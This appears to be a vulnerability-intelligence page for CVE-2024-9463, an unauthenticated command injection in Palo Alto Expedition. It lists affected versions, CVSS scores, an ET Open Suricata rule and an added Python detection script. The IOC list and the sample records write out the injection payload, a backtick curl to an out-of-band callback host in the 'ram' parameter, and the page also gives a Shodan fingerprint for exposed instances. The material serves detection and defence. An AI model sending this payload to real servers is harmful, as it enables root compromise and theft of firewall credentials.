CVE-2024-9463
published 2024-10-09


Priority: P1 · 93 · high · 7.5 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2024-12-05
Exploited in the wild
EPSS: 98.42% (99.9th percentile)
An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

Affected (5 ranges)

Vendor               Product         Version range        Fixed in
palo_alto_networks   expedition      >= 1.2.0 < 1.2.96    1.2.96
paloalto             pan-os          (none listed)        (none listed)
paloalto             panorama        (none listed)        (none listed)
paloalto             prisma_access   (none listed)        (none listed)
paloaltonetworks     expedition      >= 1.2.0 < 1.2.96    1.2.96

The two expedition rows are the same range under two vendor spellings. The pan-os, panorama and prisma_access rows carry no version range and no fix; per the description above, the vulnerable code is in Expedition itself, and the PAN-OS firewalls are affected only in that Expedition stores their credentials, configurations and API keys. The fix is Expedition 1.2.96.

Detection & IOCs (extracted from sources)

path      /API/convertCSVtoParquet.php
path      /OS/startup/restore/restoreAdmin.php
path      /bin/CronJobs.php
command   ram=watchTowr`curl+{{interactsh-url}}`   (POST body sent by the nuclei template; {{interactsh-url}} is nuclei's out-of-band callback placeholder, not a literal host)
other     http.favicon.hash:1499876150   (Shodan favicon hash filter)

Suricata/Snort rule (ET Open, sid 2057721; uses Suricata sticky-buffer keywords):
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto Expedition Remote Code Execution (CVE-2024-9463)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/API/convertCSVtoParquet.php"; fast_pattern; nocase; http.request_body; content:"ram|3d|"; pcre:"/^.*?[\x3b\x0a\x26\x60\x7c\x24]/R"; reference:cve,2024-9463; reference:url,x.com/watchtowrcyber/status/1844306954245767623; classtype:web-application-attack; sid:2057721; rev:1; metadata:affected_product Palo_Alto_Networks, attack_target Server, tls_state TLSDecrypt, created_at 2024_11_19, cve CVE_2024_9463, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_11_19, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets an HTTP POST to /API/convertCSVtoParquet.php with a 'ram' parameter carrying an OS command injection payload; the rule keys on the literal "ram=" (content:"ram|3d|") followed by one of the shell metacharacters in its pcre class: semicolon, newline, ampersand, backtick, pipe, $
  • The nuclei template's body matcher looks for the PHP notice 'Undefined index: taskID' in the response; that notice shows the handler ran without a taskID parameter, not that the injected command executed, so treat it as an endpoint-reachability signal rather than proof of compromise
  • Palo Alto Expedition instances can be fingerprinted on Shodan using favicon hash 1499876150 to identify exposed attack surface
  • The vulnerability is actively exploited in the wild and listed in CISA's Known Exploited Vulnerabilities Catalog; monitor for unauthenticated POST requests to Expedition PHP endpoints, including the three paths listed above
  • The Suricata/ET rule requires TLS decryption (SSLDecrypt) to inspect the POST body for the 'ram' parameter injection payload; without TLS inspection, the rule will not fire on HTTPS traffic
  • The nuclei template uses out-of-band (interactsh) callback detection; the 'Undefined index: taskID' body matcher alone is not sufficient to confirm exploitation without the OOB DNS/HTTP interaction
  • According to Wiz data, Expedition is exposed to the internet in less than 1% of cloud environments, with only 106 exposed servers found by FOFA; detection efforts should prioritize on-premises and hybrid deployments
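A host- or proxy-side version of the rule logic above, as an added example; it is not from the page's sources, from the ET rule authors, or from Palo Alto Networks. It applies the ET rule's raw-body check (literal "ram=" followed anywhere by one of ; \n & ` | $) and a second check that isolates the ram= value and URL-decodes it first, then runs both over constructed request records (the callback hostname and all record contents are made up). It needs request bodies, so it fits WAF, reverse-proxy or decrypted-capture exports, not Apache access logs, which do not record POST bodies. Two things the raw rule does that are worth knowing before tuning: a percent-encoded backtick (%60) does not trip it, and a second form field after ram= does, because & is in its metacharacter class.

```python
import re
from urllib.parse import unquote_plus

# Endpoint paths listed as IOCs on this page for CVE-2024-9463.
IOC_PATHS = {
    "/API/convertCSVtoParquet.php",
    "/OS/startup/restore/restoreAdmin.php",
    "/bin/CronJobs.php",
}
INJECTION_PATH = "/api/convertcsvtoparquet.php"  # compared case-insensitively, like the rule's nocase

# Same character class as the ET rule's pcre: ; \n & ` | $
SHELL_META = re.compile(r"[;\n&`|$]")
# Pulls out only the ram= value of a form body (stops at the next &).
RAM_PARAM = re.compile(r"(?:^|&)ram=([^&]*)")


def rule_match(method, uri, body):
    """Mirror the ET Open rule as written: POST, URI contains the endpoint,
    raw body contains "ram=" with a shell metacharacter somewhere after it."""
    if method != "POST" or INJECTION_PATH not in uri.lower():
        return False
    idx = body.find("ram=")
    if idx < 0:
        return False
    return SHELL_META.search(body, idx + len("ram=")) is not None


def decoded_match(method, uri, body):
    """Stricter variant: isolate the ram= value, URL-decode it (so %60, %3B,
    %7C and + are normalised), then look for a shell metacharacter."""
    if method != "POST" or uri.split("?", 1)[0].lower() != INJECTION_PATH:
        return False
    m = RAM_PARAM.search(body)
    if not m:
        return False
    return SHELL_META.search(unquote_plus(m.group(1))) is not None


def triage(records):
    """Per-request verdicts: raw rule match, decoded-parameter match, and
    whether the path is one of the page's IOC paths."""
    verdicts = {}
    for r in records:
        path = r["uri"].split("?", 1)[0]
        verdicts[r["id"]] = {
            "rule": rule_match(r["method"], r["uri"], r["body"]),
            "decoded": decoded_match(r["method"], r["uri"], r["body"]),
            "ioc_path": path in IOC_PATHS,
        }
    return verdicts


# Constructed sample records (not captured traffic); oob.example.invalid stands in
# for the {{interactsh-url}} placeholder in the nuclei template payload.
SAMPLE_REQUESTS = [
    {"id": 1, "method": "POST", "uri": "/API/convertCSVtoParquet.php",
     "body": "ram=watchTowr`curl+oob.example.invalid`"},          # raw backticks, as in the template
    {"id": 2, "method": "POST", "uri": "/API/convertCSVtoParquet.php",
     "body": "ram=watchTowr%60curl+oob.example.invalid%60"},      # same payload, percent-encoded
    {"id": 3, "method": "POST", "uri": "/API/convertCSVtoParquet.php",
     "body": "ram=2048"},                                          # plain numeric value
    {"id": 4, "method": "POST", "uri": "/API/convertCSVtoParquet.php",
     "body": "ram=2048&taskID=7"},                                 # benign value, second field follows
    {"id": 5, "method": "GET", "uri": "/bin/CronJobs.php", "body": ""},  # another listed path, no body
]

if __name__ == "__main__":
    for rid, v in triage(SAMPLE_REQUESTS).items():
        print(rid, v)
```

Record 2 is caught only by the decoded check and record 4 only by the raw rule; the first is a gap in the rule, the second a false positive of it. Both checks are still only request-side signals; as the notes above say, confirmation of execution needs the out-of-band callback or host evidence.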

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         3.1       7.5     HIGH       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd         4.0       9.9     CRITICAL   CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Amber
vulncheck             9.9     CRITICAL
cisa                  9.9     CRITICAL

The headline 7.5 high comes from the NVD v3.1 vector, which scores confidentiality impact only (C:H/I:N/A:N). The v4.0 assessments from NVD, VulnCheck and CISA rate it 9.9 critical with high impact on confidentiality, integrity and availability (VC:H/VI:H/VA:H), which matches the description of unauthenticated command execution as root better than the v3.1 score does.